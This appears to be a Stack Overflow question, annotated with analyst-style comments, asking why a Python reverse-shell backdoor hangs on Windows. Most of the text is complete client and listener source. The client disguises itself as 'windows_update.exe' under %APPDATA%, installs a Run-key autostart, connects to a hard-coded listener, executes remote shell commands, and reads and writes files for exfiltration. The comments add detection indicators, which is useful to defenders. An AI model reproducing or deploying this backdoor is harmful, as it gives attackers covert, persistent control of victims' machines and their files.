reverse shell on windows 10 x64 based pure python code crashed instantly when executing command

This works on Linux: I am able to execute any command and everything is fine.

In Windows (tried on 2 machines) I get the shell, but once I try to type any command, it just gets stuck and nothing happens. Even with plain netcat or Metasploit I wasn't able to get any shell, even with all security on it disabled.

But in this case I do get a shell; when typing the first command, though, it just gets stuck and nothing happens. The same code works fine on Linux.

This is my code:

client -

#!/usr/bin/env python
import socket
import subprocess
import json
import os
import base64
import sys
import shutil

class Backdoor:
    """Reverse-shell client: installs persistence, connects out to a hard-coded
    listener and executes the commands it receives.

    Analyst notes, from the code as posted on this page:
    - Persistence is installed before the connection is attempted.
    - Transport is a raw TCP socket carrying JSON-encoded lists; there is no
      authentication, encryption or message framing of any kind.
    - Hard-coded indicators visible here: a copy of the running executable named
      ``windows_update.exe`` under %APPDATA%, an HKCU Run-key value named
      ``update``, and a callback to 192.168.14.56:4444.
    """
    def __init__(self, ip: str, port: int) -> None:
        """Install persistence, then open the outbound TCP connection to ``ip:port``.

        Persistence runs first, so the host is modified even when the listener is
        unreachable (the failed ``connect`` then propagates to the module-level
        handler, which exits).
        """
        self.become_presistent()
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connection.connect((ip, port))

    def become_presistent(self) -> None:
        """Copy the running executable under %APPDATA% and register it for autostart.

        What the code does:
        - ``sys.executable`` (the interpreter, or the frozen binary if the script
          was packaged) is copied to ``%APPDATA%\\windows_update.exe``.
        - ``reg.exe`` is invoked through the shell (``shell=True``) to add a
          ``REG_SZ`` value named ``update`` to the HKCU Run key pointing at that
          copy. Only the first run does this; the step is skipped once the file
          exists.

        Detection / mitigation notes:
        - A new executable written directly under %APPDATA% followed by a Run-key
          modification performed by a shell-spawned ``reg.exe`` is a classic
          autorun-persistence pattern worth alerting on.
        - ``os.environ["appdata"]`` (lower-case) resolves only where environment
          lookups are case-insensitive; on POSIX it raises ``KeyError`` unless a
          variable with that exact name exists.
        - NOTE(review): the registry path in the ``reg add`` string has no path
          separators as pasted ("HKCUSoftware..."); backslashes were most likely
          lost when the code was posted. Left byte-for-byte as posted.
        """
        evil_file_location = os.environ["appdata"] + "\windows_update.exe"
        if not os.path.exists(evil_file_location):
            shutil.copyfile(sys.executable, evil_file_location)
            subprocess.call('reg add HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v update /t REG_SZ /d "' + evil_file_location + '"', shell=True)

    def reliable_send(self, data) -> None:
        """JSON-encode ``data`` and write it with a single ``send``.

        Despite the name there is no length prefix or delimiter, and the number
        of bytes actually written (the return value of ``send``) is ignored, so a
        partial send goes unnoticed.
        """
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def reliable_receive(self):
        """Accumulate ``recv`` chunks until the buffer parses as JSON, then return it.

        ``ValueError`` (the base of ``json.JSONDecodeError``) is treated as "message
        not complete yet"; any other exception propagates. An empty ``recv`` result
        (peer closed the socket) is never checked, so on disconnect this loop spins
        forever rather than terminating.
        """
        json_data = ""
        while True:
            try:
                # Each chunk is passed through str() before being appended to the buffer.
                json_data = json_data + str(self.connection.recv(1024))
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_system_command(self, command) -> bytes:
        """Run ``command`` via the system shell and return its captured stdout.

        ``command`` is the JSON-decoded list received from the listener (see
        ``run``), handed unmodified to ``check_output`` with ``shell=True``; stderr
        is discarded. A non-zero exit raises ``CalledProcessError``, which ``run``
        collapses into its generic error string.
        """

        return subprocess.check_output(command, shell=True, stderr=subprocess.DEVNULL)

    def chaning_working_directory_to(self, path: str) -> str:
        """Change the process working directory to ``path`` and return a status string.

        A bad path raises from ``os.chdir`` and is handled by ``run``.
        """
        os.chdir(path)
        return "[+] chaning directory to " + path

    def read_file(self, path: str) -> bytes:
        """Return the whole file at ``path`` as base64-encoded bytes (exfiltration side of ``download``).

        The file is read fully into memory; no size limit is applied.
        """
        with open(path, "rb") as file:
            return base64.b64encode(file.read())

    def write_file(self, path: str, content) -> str:
        """Base64-decode ``content`` and write it to ``path`` (the ``upload`` command).

        ``path`` comes straight from the remote operator; nothing restricts where
        the file may be written.
        """
        with open(path, "wb") as file:
            file.write(base64.b64decode(content))
            return "[+] download successful."

    def run(self) -> None:
        """Command loop: receive a list, dispatch on its first element, send back the result.

        Dispatch: ``exit`` closes the socket and terminates the process; ``cd <path>``
        changes directory; ``download <path>`` returns the file base64-encoded;
        ``upload <path> <b64>`` writes a file; anything else is executed as a shell
        command. The received list is trusted as-is (no shape or type check before
        indexing), and every failure inside the handler collapses to one generic
        string, so the listener cannot tell failure causes apart.
        """
        while True:
            command = self.reliable_receive()
            try:
                if command[0] == "exit":
                    self.connection.close()
                    # SystemExit is not an Exception subclass, so the handler below does not swallow it.
                    sys.exit()
                elif command[0] == "cd" and len(command) > 1:
                    command_result = self.chaning_working_directory_to(command[1])
                elif command[0] == "download":
                    command_result = self.read_file(command[1])
                elif command[0] == "upload":
                    command_result = self.write_file(command[1], command[2])
                else:
                    command_result = self.execute_system_command(command)
            except Exception:
                command_result = "[-] error during command execution"

            self.reliable_send(command_result)
# Entry point. The callback target is hard-coded (192.168.14.56:4444). Any
# exception raised while installing persistence, connecting, or running the
# command loop terminates the process silently: no logging, no retry.
try:
    my_backdoor = Backdoor("192.168.14.56", 4444)
    my_backdoor.run()
except Exception:
    sys.exit()

server =

#!/usr/bin/python
import socket, json, base64

class Listener:
    """Operator side of the reverse shell: accepts one inbound connection and
    relays typed commands to it over the same unauthenticated JSON-over-TCP
    scheme as the client.
    """
    def __init__(self, ip: str, port: int) -> None:
        """Bind to ``ip:port``, block until one client connects, and keep that socket.

        ``SO_REUSEADDR`` allows rebinding while a previous socket is in TIME_WAIT;
        the listening socket itself is a local and is never closed.
        """
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((ip, port))
        listener.listen(0)
        print("[+] waiting for connection")
        self.connection, address = listener.accept()
        print("[+] got a connectoon from " + str(address))

    def reliable_send(self, data) -> None:
        """JSON-encode ``data`` and write it with a single ``send``.

        Same caveat as the client: no framing, and the byte count returned by
        ``send`` is ignored, so partial sends are not detected.
        """
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def reliable_receive(self):
        """Accumulate ``recv`` chunks until the buffer parses as JSON, then return it.

        Only ``ValueError`` is treated as "incomplete"; an empty ``recv`` (peer
        gone) is never checked, so the loop spins forever if the client dies.
        This is where the traceback on this page was interrupted (Ctrl-C while
        waiting for the first reply).
        NOTE(review): that traceback prints this line without the ``str()``
        wrapper, so the code as run may differ slightly from the code as posted.
        """
        json_data = ""
        while True:
            try:
                json_data = json_data + str(self.connection.recv(1024))
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_remotely(self, command):
        """Send ``command`` to the client and return its reply.

        For ``exit`` the socket is closed and the process ends without waiting
        for a reply; ``exit()`` here is the site-module builtin, not ``sys.exit``.
        """
        self.reliable_send(command)

        if command[0] == "exit":
            self.connection.close()
            exit()

        return self.reliable_receive()

    def write_file(self, path: str, content) -> str:
        """Base64-decode ``content`` and save it to ``path`` (local side of ``download``)."""
        with open(path, "wb") as file:
            file.write(base64.b64decode(content))
            return "[+] download successful."

    def read_file(self, path: str) -> bytes:
        """Return the local file at ``path`` as base64-encoded bytes (local side of ``upload``)."""
        with open(path, "rb") as file:
            return base64.b64encode(file.read())

    def run(self) -> None:
        """Interactive prompt loop: read a line, split on single spaces, relay it, print the result.

        Splitting on ``" "`` means paths containing spaces are broken into several
        list elements. For ``upload`` the local file's base64 content is appended
        as the third element before sending; for ``download`` the reply is written
        to the given local path.
        NOTE(review): the ``"[-] Error "`` guard is compared against the client's
        error string, which is spelled ``"[-] error ..."`` (lower case) on this
        page, so the two never match and a failed download would write the error
        text into the target file.
        """
        while True:
            command = raw_input(">> ")
            command = command.split(" ")
            try:

                if command[0] == "upload":
                    file_content = self.read_file(command[1])
                    command.append(file_content)

                result = self.execute_remotely(command)

                if command[0] == "download" and "[-] Error " not in result:
                    result = self.write_file(command[1], result)
            except Exception:
                result = "[-] Error during command"

            print (result)

# Entry point: bind address and port are hard-coded (192.168.14.101:4444); there
# is no error handling around bind/accept, so any failure there is a raw traceback.
my_listener = Listener("192.168.14.101", 4444)
my_listener.run()

The output I get:

[+] waiting for connection
[+] got a connectoon from ('192.168.14.101', 63817)
>> ls
^CTraceback (most recent call last):
  File "listener.py", line 65, in <module>
    my_listener.run()
  File "listener.py", line 55, in run
    result = self.execute_remotely(command)
  File "listener.py", line 34, in execute_remotely
    return self.reliable_receive()
  File "listener.py", line 22, in reliable_receive
    json_data = json_data + self.connection.recv(1024)
KeyboardInterrupt
question from:https://stackoverflow.com/questions/65947331/reverse-shell-on-windows-10-x64-based-pure-python-code-crashed-instantly-when-ex
